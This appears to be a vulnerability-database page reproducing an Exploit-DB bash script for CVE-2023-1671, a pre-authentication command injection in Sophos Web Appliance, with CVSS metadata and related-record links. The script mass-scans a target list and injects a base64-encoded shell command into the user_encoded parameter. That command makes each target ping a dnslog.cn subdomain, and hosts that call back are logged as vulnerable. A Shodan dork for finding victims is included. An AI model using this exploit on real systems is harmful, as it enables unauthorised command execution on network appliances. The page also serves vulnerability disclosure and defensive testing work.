Lucene search
Behnam Abasi VandaEDB-ID:51396HistoryApr 25, 2023 - 12:00 a.m.
Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
2023-04-2500:00:00
Behnam Abasi Vanda
www.exploit-db.com
217
sophos web appliance
pre-auth command injection
ubuntu
cve-2023-1671
shodan dork
vulnerability analysis
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.8
Confidence
High
EPSS
0.962
Percentile
99.6%
#!/bin/bash
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version: Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis
TARGET_LIST="$1"
# =====================
BOLD="\033[1m"
RED="\e[1;31m"
GREEN="\e[1;32m"
YELLOW="\e[1;33m"
BLUE="\e[1;34m"
NOR="\e[0m"
# ====================
get_new_subdomain()
{
cat MN.txt | grep 'YES' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo -e " [+] Trying to get Subdomain $NOR"
rm -rf cookie.txt
sub=`curl -i -c cookie.txt -s -k -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
$'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn`
echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"
fi
}
check_vuln()
{
curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"
req=`curl -i -s -k -b cookie.txt -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
$'http://www.dnslog.cn/getrecords.php?t=0'`
echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo "YES" > MN.txt
echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"
echo "https://$1" >> vulnerable.lst
else
echo -e " [-] https://$1 Not Vulnerable :| $NOR"
echo "NO" > MN.txt
fi
}
echo '
āāāāāāāāāā āāāāāāāāāāā āāāāāāā āāāāāāā āāāāāāā āāāāāāā āāā āāāāāāāāāāāāāāā
āāāāāāāāāāā āāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāā
āāā āāā āāāāāāāāāāāāāāā āāāāāāāāāāāāāāāā āāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāā āāāā
āāā āāāā āāāāāāāāāāāāāāāāāāāāāāā āāāāāāāāāāāāāāāā āāāāāāāāāāāāā āāāāāāāāāāāā āāāā
āāāāāāāā āāāāāāā āāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāāāāāā āāā
āāāāāāā āāāāā āāāāāāāā āāāāāāāā āāāāāāā āāāāāāāāāāāāāāā āāā āāāāāāā āāā
āāāāāāā āāā āāā āāāāāāā āāāāāāāāāāā āāāāāāā āāā āāāāāā āāāā āāāā āāā
āāāāāāāāāāāā āāāā āāāāāāāāāāāāāāāāāāā āāāāāāāā āāāāāāāāāāāāāāāā āāāāā āāāāāāā
āāāāāāāā āāāāāāā āāāāāāāāāāāāāā āāāāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāā āāā āāā
āāāāāāāā āāāāā āāāāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāā āāā
āāāāāāāā āāā āāāāāāāāāāāāāāāāāāā āāāāāā āāāāāāāāā āāāāāā āāā āāā āāāāāāā
āāāāāāā āāā āāāāāāā āāāāāāāāāāā āāāāāā āāāāāāāā āāāāāā āāā āāā
'
if test "$#" -ne 1; then
echo " ----------------------------------------------------------------"
echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
echo " ---------------------------------------------------------------"
exit
fi
rm -rf cookie.txt
echo "YES" > MN.txt
for target in `cat $TARGET_LIST`
do
get_new_subdomain;
echo " [~] Checking $target"
check_vuln "$target"
done
rm -rf MN.txt
rm -rf cookie.txt
Related
attackerkb
attackerkb
CVE-2023-1671
2023-04-04 00:00:00
nvd
nvd
CVE-2023-1671
2023-04-04 10:15:07
packetstorm
packetstorm
Sophos Web Appliance 4.3.10.4 Command Injection
2023-04-26 00:00:00
prion
prion
Command injection
2023-04-04 10:15:00
nuclei
nuclei
Sophos Web Appliance - Remote Code Execution
2023-04-27 15:42:42
cvelist
cvelist
CVE-2023-1671
2023-04-04 00:00:00
saint
saint
Sophos Web Appliance UsrBlocked.php command injection
2023-11-24 00:00:00
Sophos Web Appliance UsrBlocked.php command injection
2023-11-24 00:00:00
nessus
nessus
Sophos Web Appliance Pre-Authentication Command Injection (CVE-2023-1671)
2023-05-18 00:00:00
githubexploit
githubexploit
Exploit for Command Injection in Sophos Web Appliance
2023-04-25 15:19:41
Exploit for Command Injection in Sophos Web Appliance
2023-04-27 04:31:44
Exploit for Command Injection in Sophos Web Appliance
2023-04-24 15:53:42
zdt
zdt
Sophos Web Appliance 4.3.10.4 - Pre-auth command injection Exploit
2023-04-25 00:00:00
cisa_kev
cisa_kev
Sophos Web Appliance Command Injection Vulnerability
2023-11-16 00:00:00
cve
cve
CVE-2023-1671
2023-04-04 10:15:07
thn
thn
CISA Adds Three Security Flaws with Active Exploitation to KEV Catalog
2023-11-17 05:57:00
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.8
Confidence
High
EPSS
0.962
Percentile
99.6%
Related for EDB-ID:51396